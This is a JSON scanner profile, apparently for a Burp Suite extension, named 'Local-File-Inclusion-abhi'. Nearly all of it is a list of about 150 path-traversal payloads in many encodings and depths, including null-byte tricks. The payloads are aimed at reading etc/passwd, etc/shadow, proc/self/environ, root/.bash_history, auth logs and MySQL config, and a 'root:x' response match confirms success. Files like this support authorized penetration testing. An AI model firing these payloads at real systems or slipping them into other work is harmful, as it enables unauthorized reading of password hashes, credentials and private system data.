[
  {
    "ProfileName": "Local-File-Inclusion-abhi",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@abhiunix",
    "Payloads": [
      "true,.//..//{FILE}",
      "true,.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,./../{FILE}",
      "true,./.././../{FILE}",
      "true,./.././.././.././../{FILE}",
      "true,./.././.././.././.././../{FILE}",
      "true,./.././.././.././.././.././../{FILE}",
      "true,./.././.././.././.././.././.././../{FILE}",
      "true,./.././.././.././.././.././.././.././../{FILE}",
      "true,..///{FILE}",
      "true,..///..///{FILE}",
      "true,..///..///..///{FILE}",
      "true,..///..///..///..///{FILE}",
      "true,..///..///..///..///..///{FILE}",
      "true,..///..///..///..///..///..///{FILE}",
      "true,..///..///..///..///..///..///..///{FILE}",
      "true,..///..///..///..///..///..///..///..///{FILE}",
      "true,..//{FILE}",
      "true,..//..//{FILE}",
      "true,..//..//..//{FILE}",
      "true,..//..//..//..//{FILE}",
      "true,..//..//..//..//..//{FILE}",
      "true,..//..//..//..//..//..//{FILE}",
      "true,..//..//..//..//..//..//..//{FILE}",
      "true,..//..//..//..//..//..//..//..//{FILE}",
      "true,../../{FILE}",
      "true,../..//{FILE}",
      "true,../..///{FILE}",
      "true,../..//../{FILE}",
      "true,../..//..///{FILE}",
      "true,../..//../..//{FILE}",
      "true,../..//../..///{FILE}",
      "true,../..//../..//../{FILE}",
      "true,../..//../..//..///{FILE}",
      "true,../..//../..//../..//{FILE}",
      "true,../..//../..//../..///{FILE}",
      "true,../..//../..//../..//../{FILE}",
      "true,../..//../..//../..//..///{FILE}",
      "true,../..//../..//../..//../..//{FILE}",
      "true,../..//../..//../..//../..///{FILE}",
      "true,../{FILE}",
      "true,../../{FILE}",
      "true,../../../{FILE}",
      "true,../../../../{FILE}",
      "true,../../../../../{FILE}",
      "true,../../../../../../{FILE}",
      "true,../../../../../../../{FILE}",
      "true,../../../../../../../../{FILE}",
      "true,../{FILE}%00.png",
      "true,../../{FILE}%00.png",
      "true,../../../{FILE}%00.png",
      "true,../../../../{FILE}%00.png",
      "true,../../../../../{FILE}%00.png",
      "true,../../../../../../{FILE}%00.png",
      "true,../../../../../../../{FILE}%00.png",
      "true,../../../../../../../../{FILE}%00.png",
      "true,....//{FILE}",
      "true,....//....//{FILE}",
      "true,....//....//....//{FILE}",
      "true,....//....//....//....//{FILE}",
      "true,....//....//....//....//....//{FILE}",
      "true,....//....//....//....//....//....//{FILE}",
      "true,....//....//....//....//....//....//....//{FILE}",
      "true,....//....//....//....//....//....//....//....//{FILE}",
      "true,....//....//....//....//....//....//....//....//....//{FILE}",
      "true,....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
      "true,..%2f{FILE}",
      "true,..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%252f{FILE}",
      "true,..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%%32%66{FILE}",
      "true,..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
      "true,%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
      "true,%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
      "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,root:x"
    ],
    "Tags": [
      "PathTraversal",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "Local-File-Inclusion-abhi",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/passwd",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/shadow",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/group",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/hostname",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/issue",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/os-release",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "proc/self/environ",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "proc/self/cmdline",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "proc/mounts",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "root/.bash_history",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/mysql/my.cnf",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "var/log/syslog",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "var/log/auth.log",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/apt/sources.list",
        "regex": "String"
      },
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "boot/grub/grub.cfg",
        "regex": "String"
      }
    ],
    "VariationAttributes": [],
    "InsertionPointType": [
      1,
      6,
      0
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]
